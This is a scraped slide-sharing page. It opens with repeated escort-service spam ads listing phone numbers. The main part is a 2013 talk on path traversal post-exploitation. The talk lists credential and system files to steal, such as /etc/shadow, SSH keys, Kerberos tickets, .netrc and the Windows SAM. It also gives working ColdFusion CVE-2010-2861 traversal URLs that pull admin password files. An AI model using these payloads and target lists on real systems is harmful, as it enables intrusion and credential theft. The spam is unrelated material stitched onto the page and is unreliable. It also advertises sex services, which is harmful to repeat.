VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
 
📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱
📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱
📱Dehradun Call Girls Service 📱☎️ +91'905,3900,678 ☎️📱 Call Girls In Dehradun 📱
 
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
 

4.1. Path traversal post_exploitation

  • 1. Path traversal post exploitation By George Lagoda Nov 23, 2013
  • 2. This slide intentionally left blank (always dreamed of it )
  • 3.
  • 4. Common understanding of path traversal A Path Traversal attack aims to access files and directories that are stored outside the web root folder. (OWASP) WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
  • 5. /etc/passwd – why so special?
  • 6. Y.O.B.A. hacking NEXT STEPS 1. /root/.bash_history if not accessible try harder: /home/username/.bash_history game me:
  • 7. Looks like epic win??: After analyzing prepare_release.sh:
  • 8.
  • 9. .netrc file • Provides remember me for ftp What I had when checked /home/username/.netrc : machine ftp.server.com login secret_usr password secret_pwd
  • 10. Help for shell uploading /proc/self/environ /proc/self/status Useful if we wanna find access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning
  • 11. Smtg fo crds • SSH keys, often passwordless: /home/*/.ssh/id* • Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab • PGP keys: /home/*/.gnupg/secring.gpgs
  • 12. What distro we have? • /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat • /etc/fedora-release # Fedora • /etc/slackware-release, • /etc/slackware-version # Slackware • /etc/debian_release, /etc/debian_version # Debian • /etc/mandrake-release # Mandrake • /etc/sun-release # Sun JDS • /etc/release # Solaris/Sparc • /etc/gentoo-release # Gentoo • /etc/arch-release # Arch Linux (file will be empty) • arch # OpenBSD; sample: “OpenBSD.amd64”
  • 14. File Expected Contents / Description %SYSTEMDRIVE%boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. %WINDIR%win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case. %SYSTEMROOT%repairSAM %SYSTEMROOT%System32configR egBackSAM It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in repair is locked, but can be retired using forensic or Volume Shadow copy methods %SYSTEMROOT%repairsystem %SYSTEMROOT%System32configR egBacksystem %SYSTEMDRIVE%autoexec.bat
  • 15. %SYSTEMDRIVE%pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size %WINDIR%system32logfileshttperrhttperr1.log IIS 6 error log %SystemDrive%inetpublogsLogFiles IIS 7’s logs location %WINDIR%system32logfilesw3svc1exY YMMDD.log (year month day) %WINDIR%system32configAppEvent.Evt %WINDIR%system32configSecEvent.Evt %WINDIR%system32configdefault.sav %WINDIR%system32configsecurity.sav %WINDIR%system32configsoftware.sav %WINDIR%system32configsystem.sav %WINDIR%system32CCMlogs*.log %USERPROFILE%ntuser.dat
  • 16. U really thought I will forget bout kittens?
  • 17. • /etc/passwd • /etc/shadow (gotta try..) • /etc/shadow~ # (sometimes there when edited with gedit) • /etc/master.passwd • /etc/group • /etc/hosts • /etc/crontab • /etc/sysctl.conf • /etc/resolv.conf • /etc/samba/smb.conf • /etc/exports • /etc/auto.master • /etc/auto_maste • /etc/fstab • /etc/exports • /etc/sudoers
  • 19. Also for cold fusion(not the last vers but still) ColdFusion 6: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword. properties%00en ColdFusion 7: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpasswor d.properties%00en ColdFusion 8 http://site/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpasswor d.properties%00en All versions: http://site/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusio ncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en http://www.cvedetails.com/cve/CVE-2010-2861/
  • 20. • In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/
  • 22. Thank you for visiting us And HACK YOU  (the end).